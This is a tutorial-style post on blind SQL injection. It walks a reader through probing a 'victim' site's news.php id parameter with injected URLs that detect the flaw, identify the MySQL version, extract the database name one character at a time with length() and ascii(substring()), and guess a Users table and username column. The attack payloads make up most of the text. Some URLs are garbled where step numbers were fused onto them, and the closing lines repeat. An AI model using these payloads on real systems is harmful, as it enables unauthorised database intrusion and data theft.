This type of SQL injection is very difficult, because this technique is based on true or false statements. This technique should be used only if the error based technique doesn't work. Well first of all you need to find an vulnerability on the website of the victim. To do this you need to add "+AND+1=1" on the end.
www.victim.com/news.php?id=6+AND+1=1
Web site of the victim should be unchanged. Now you try to add "+AND+1=2" on the end.
www.victim.com/news.php?id=6+AND+1=2
If you see an error in the browser then you are on a good way. This means that the website is vulnerable.
Now it's time to find out the version of the database. For this action we use "Substring" keyword. For example.
www.victim.com/news.php?id=6+and+substring(@@version,1,1)=4
If you see an error in the browser it means that your database isn't version 4 (ex. 4.2.2). Now we need to check is it version 5 (ex. 5.0.51b-log).
www.victim.com/news.php?id=6+and+substring(@@version,1,1)=5
You'll probably get the normal view page without errors. This means that the database version is a 5. Now it's time to test subselect.
www.victim.com/news.php?id=6+and+(select+1)=1
If no error occurs, subselect is correct. The next step is to find the name of the database. First you need to find how many characters contain the name of the database. For this action I use "Length" keyword. For example.
1 question: Is it lower then 10?
www.victim.com/news.php?id=6+and+length(database())<10
1 answer: No error = YES
www.victim.com/news.php?id=6+and+length(database())<62 answer: Error = NO
3 question: Is it equal 6?
www.victim.com/news.php?id=6+and+length(database())=63 answer: No error = YES
Now we know that the name of the database contains 6 characters. It's time to show you how to find them. The principle is the same like searching for how many character contains the name.
1 question: Is it lower then 97?
www.victim.com/news.php?id=6+and+ascii(substring(database(),1,1))<971 answer: Error = NO
2 question: Is it lower then 122?
www.victim.com/news.php?id=6+and+ascii(substring(database(),1,1))<1222 answer: No Error = YES
This means that the first character of the name of the database is between 97 and 122 on ascii codes table. see full ascii codes table for all symbols, characters and numbers.
3 question: Is it equal 118?
www.victim.com/news.php?id=6+and+ascii(substring(database(),1,1))=1183 answer: No Error = YES
We find the first character of six. It's 118. If you look at http://ascii-ascii.blogspot.com you'll see that 118 is equal to the letter lowercase "v". Now we need to find second letter.
1 question: Is it lower then 108?
www.victim.com/news.php?id=6+and+ascii(substring(database(),2,1))<1081 answer: No error =YES
2 question: Is it equal 105?
www.victim.com/news.php?id=6+and+ascii(substring(database(),2,1))=1052 answer: No error =YES
We find the second character of six. It's 105. If you look at http://ascii-ascii.blogspot.com you'll see that 105 is equal to the letter lowercase "i".
We do the same thing for the third character.
1 question: Is it lower then 102?
www.victim.com/news.php?id=6+and+ascii(substring(database(),3,1))<1021 answer: No error =YES
2 question: Is it equal 99?
www.victim.com/news.php?id=6+and+ascii(substring(database(),3,1))=992 answer: No error =YES
And we find the third character of six. It's 99. If you look at http://ascii-ascii.blogspot.com you'll see that 99 is equal to the letter lowercase "c".
We have 3 letters "vic..." I assumed the database name is "victim". On the same way you can find tables, columns even data. Query's for obtaining this information can be found at http://web-injection.blogspot.com/2010/10/error-based-sql-injections.html. Also you can use some tools like "BlindCat".
Sometimes you can try to find tables or columns with a guessing. For example assuming that there is a table "Users".
www.victim.com/news.php?id=6+and+(select+1+from+Users+limit+0,1)=1Error = Not exist
No Error= Exist
For column "username" in table "Users" query would look like this.
www.victim.com/news.php?id=6+and+(select+substring(concat(1,username),1,1)+from+Users+limit+0,1)=1
Error = Not exist
No Error= Exist
Be creative ...
No Error= Exist
Be creative ...